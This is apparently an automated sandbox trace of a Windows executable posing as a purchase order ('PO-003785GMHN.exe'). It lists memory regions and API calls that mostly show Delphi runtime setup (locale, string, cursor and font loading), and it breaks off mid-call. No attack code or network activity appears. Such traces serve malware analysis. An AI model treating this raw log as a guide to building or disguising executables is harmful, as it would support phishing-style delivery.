mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 393 start_va = 0x2760000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 394 start_va = 0x34b0000 end_va = 0x35affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 395 start_va = 0x6fe70000 end_va = 0x6fe89fff monitored = 0 entry_point = 0x6fe7fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 396 start_va = 0x35b0000 end_va = 0x36affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 397 start_va = 0x36b0000 end_va = 0x37affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 398 start_va = 0x37b0000 end_va = 0x38affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 399 start_va = 0x38b0000 end_va = 0x3942fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038b0000" filename = "" Region: id = 400 start_va = 0x3950000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 401 start_va = 0x2140000 end_va = 0x2140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 402 start_va = 0x7fe00000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe00000" filename = "" Region: id = 403 start_va = 0x7fd00000 end_va = 0x7fdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fd00000" filename = "" Region: id = 404 start_va = 0x7fc00000 end_va = 0x7fcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fc00000" filename = "" Region: id = 405 start_va = 0x3a90000 end_va = 0x3bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 406 start_va = 0x50480000 end_va = 0x504a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000050480000" filename = "" Region: id = 426 start_va = 0x50480000 end_va = 0x504a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000050480000" filename = "" Thread: id = 1 os_tid = 0x12c4 [0074.974] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0074.976] GetKeyboardType (nTypeFlag=0) returned 4 [0075.133] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe\" " [0075.133] GetStartupInfoA (in: lpStartupInfo=0x19fef0 | out: lpStartupInfo=0x19fef0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0075.134] GetACP () returned 0x4e4 [0075.134] GetCurrentThreadId () returned 0x12c4 [0075.134] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19ede0, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0075.134] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19ecbb, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0075.134] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19edd0 | out: phkResult=0x19edd0*=0x0) returned 0x2 [0075.134] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19edd0 | out: phkResult=0x19edd0*=0x0) returned 0x2 [0075.245] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19edd0 | out: phkResult=0x19edd0*=0x0) returned 0x2 [0075.245] lstrcpynA (in: lpString1=0x19ecbb, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe", iMaxLength=261 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" [0075.246] GetThreadLocale () returned 0x409 [0075.246] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x19edcb, cchData=5 | out: lpLCData="ENU") returned 4 [0075.246] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe") returned 47 [0075.246] lstrcpynA (in: lpString1=0x19ece7, lpString2="ENU", iMaxLength=217 | out: lpString1="ENU") returned="ENU" [0075.246] LoadLibraryExA (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0075.246] lstrcpynA (in: lpString1=0x19ece7, lpString2="EN", iMaxLength=217 | out: lpString1="EN") returned="EN" [0075.246] LoadLibraryExA (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0075.247] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0075.247] VirtualAlloc (lpAddress=0x0, dwSize=0x140000, flAllocationType=0x1000, flProtect=0x4) returned 0x24a0000 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffd8, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0075.248] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="Invalid filename") returned 0x10 [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x19ef10, cchBufferMax=4096 | out: lpBuffer="File not found") returned 0xe [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x19eefc, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0075.249] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x19eefc, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0075.249] GetVersionExA (in: lpVersionInformation=0x19fe94*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe94*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0075.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74530000 [0075.250] GetProcAddress (hModule=0x74530000, lpProcName="GetDiskFreeSpaceExA") returned 0x745569d0 [0075.250] GetThreadLocale () returned 0x409 [0075.250] GetSystemMetrics (nIndex=42) returned 0 [0075.897] GetThreadLocale () returned 0x409 [0075.897] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Jan") returned 4 [0075.897] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="January") returned 8 [0075.897] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Feb") returned 4 [0075.897] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="February") returned 9 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Mar") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="March") returned 6 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Apr") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="April") returned 6 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="May") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="May") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Jun") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="June") returned 5 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Jul") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="July") returned 5 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Aug") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="August") returned 7 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Sep") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="September") returned 10 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Oct") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="October") returned 8 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Nov") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="November") returned 9 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Dec") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="December") returned 9 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Sun") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Sunday") returned 7 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Mon") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Monday") returned 7 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Tue") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Tuesday") returned 8 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Wed") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Wednesday") returned 10 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Thu") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Thursday") returned 9 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Fri") returned 4 [0075.898] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Friday") returned 7 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Sat") returned 4 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x19fd6c, cchData=256 | out: lpLCData="Saturday") returned 9 [0075.899] GetThreadLocale () returned 0x409 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="$") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="0") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="0") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x19fec0, cchData=2 | out: lpLCData=",") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x19fec0, cchData=2 | out: lpLCData=".") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="2") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x19fec0, cchData=2 | out: lpLCData="/") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0075.899] GetThreadLocale () returned 0x409 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fd94, cchData=256 | out: lpLCData="1") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0075.899] GetThreadLocale () returned 0x409 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fd94, cchData=256 | out: lpLCData="1") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x19fec0, cchData=2 | out: lpLCData=":") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="AM") returned 3 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="PM") returned 3 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="0") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="0") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x19fdc8, cchData=256 | out: lpLCData="0") returned 2 [0075.899] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x19fec0, cchData=2 | out: lpLCData=",") returned 2 [0075.900] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x743f0000 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VariantChangeTypeEx") returned 0x74407260 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarNeg") returned 0x74452470 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarNot") returned 0x744536e0 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarAdd") returned 0x7442cbb0 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarSub") returned 0x7442e0d0 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarMul") returned 0x7442d800 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarDiv") returned 0x74452980 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarIdiv") returned 0x74453320 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarMod") returned 0x74453580 [0075.900] GetProcAddress (hModule=0x743f0000, lpProcName="VarAnd") returned 0x74423690 [0075.901] GetProcAddress (hModule=0x743f0000, lpProcName="VarOr") returned 0x74453790 [0075.901] GetProcAddress (hModule=0x743f0000, lpProcName="VarXor") returned 0x74453930 [0075.901] GetProcAddress (hModule=0x743f0000, lpProcName="VarCmp") returned 0x74402ae0 [0075.901] GetProcAddress (hModule=0x743f0000, lpProcName="VarI4FromStr") returned 0x74405140 [0075.901] GetProcAddress (hModule=0x743f0000, lpProcName="VarR4FromStr") returned 0x74423020 [0075.901] GetProcAddress (hModule=0x743f0000, lpProcName="VarR8FromStr") returned 0x74423cd0 [0075.902] GetProcAddress (hModule=0x743f0000, lpProcName="VarDateFromStr") returned 0x74418b20 [0075.902] GetProcAddress (hModule=0x743f0000, lpProcName="VarCyFromStr") returned 0x74402280 [0075.902] GetProcAddress (hModule=0x743f0000, lpProcName="VarBoolFromStr") returned 0x744044d0 [0075.902] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromCy") returned 0x744231c0 [0075.902] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromDate") returned 0x744199f0 [0075.902] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromBool") returned 0x74404480 [0075.902] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x1b8 [0075.902] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1bc [0075.902] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1c0 [0075.903] GetDC (hWnd=0x0) returned 0xa0100d0 [0075.903] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0075.903] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0075.903] GetDC (hWnd=0x0) returned 0xa0100d0 [0075.903] GetDeviceCaps (hdc=0xa0100d0, index=104) returned 0 [0075.903] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0075.903] CreatePalette (plpal=0x19fb24) returned 0xffffffff97080952 [0075.903] GetStockObject (i=7) returned 0x1b00017 [0075.903] GetStockObject (i=5) returned 0x1900015 [0075.903] GetStockObject (i=13) returned 0x18a0048 [0075.903] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0075.903] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0075.904] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fe00 | out: phkResult=0x19fe00*=0x1c4) returned 0x0 [0075.904] RegQueryValueExA (in: hKey=0x1c4, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x19fdd0, lpData=0x0, lpcbData=0x19fdec*=0x0 | out: lpType=0x19fdd0*=0x1, lpData=0x0, lpcbData=0x19fdec*=0x7) returned 0x0 [0075.904] RegQueryValueExA (in: hKey=0x1c4, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x19fde8, lpData=0x25bc308, lpcbData=0x19fdf8*=0x7 | out: lpType=0x19fde8*=0x1, lpData="Tahoma", lpcbData=0x19fdf8*=0x7) returned 0x0 [0075.904] RegCloseKey (hKey=0x1c4) returned 0x0 [0075.904] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x76300000 [0075.904] GetVersion () returned 0x23f00206 [0075.904] GetCurrentProcessId () returned 0x12b8 [0075.904] GlobalAddAtomA (lpString="Delphi000012B8") returned 0xc089 [0075.905] GetCurrentThreadId () returned 0x12c4 [0075.905] GlobalAddAtomA (lpString="ControlOfs00400000000012C4") returned 0xc088 [0075.905] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000012C4") returned 0xc1da [0075.905] GetProcAddress (hModule=0x76300000, lpProcName="GetMonitorInfoA") returned 0x76317e40 [0075.905] GetProcAddress (hModule=0x76300000, lpProcName="GetSystemMetrics") returned 0x76319160 [0075.905] GetSystemMetrics (nIndex=19) returned 1 [0075.905] GetSystemMetrics (nIndex=75) returned 1 [0075.905] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x25c3418, fWinIni=0x0 | out: pvParam=0x25c3418) returned 1 [0075.907] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0075.907] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0075.907] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x500fd [0075.910] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0075.910] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0075.910] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0075.910] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x4026f [0075.911] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x5014b [0075.913] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x150139 [0075.914] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x13023b [0075.915] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x160075 [0076.062] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x80355 [0076.063] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0076.063] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0076.063] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0076.063] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0076.063] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0076.064] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0076.064] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0076.064] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0076.064] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0076.064] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0076.064] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0076.064] GetDC (hWnd=0x0) returned 0xa0100d0 [0076.064] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0076.064] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0076.065] GetProcAddress (hModule=0x76300000, lpProcName="EnumDisplayMonitors") returned 0x76338d90 [0076.065] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x453f5c, dwData=0x25bc3d8) returned 1 [0076.065] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x19fe8b, fWinIni=0x0 | out: pvParam=0x19fe8b) returned 1 [0076.065] CreateFontIndirectA (lplf=0x19fe8b) returned 0x200a06c1 [0076.066] GetObjectA (in: h=0x200a06c1, c=60, pv=0x19fc78 | out: pv=0x19fc78) returned 60 [0076.066] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x19fd37, fWinIni=0x0 | out: pvParam=0x19fd37) returned 1 [0076.073] CreateFontIndirectA (lplf=0x19fe13) returned 0x160a0990 [0076.073] GetObjectA (in: h=0x160a0990, c=60, pv=0x19fc78 | out: pv=0x19fc78) returned 60 [0076.073] CreateFontIndirectA (lplf=0x19fdd7) returned 0x1e0a0997 [0076.074] GetObjectA (in: h=0x1e0a0997, c=60, pv=0x19fc78 | out: pv=0x19fc78) returned 60 [0076.074] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0 [0076.074] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19fdeb, nSize=0x100 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0076.076] OemToCharA (in: pSrc="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe", pDst=0x19fdeb | out: pDst="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe") returned 1 [0076.077] GetClassInfoA (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x19fd98 | out: lpWndClass=0x19fd98) returned 0 [0076.077] RegisterClassA (lpWndClass=0x478aec) returned 0xc1d6 [0076.077] CreateWindowExA (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, 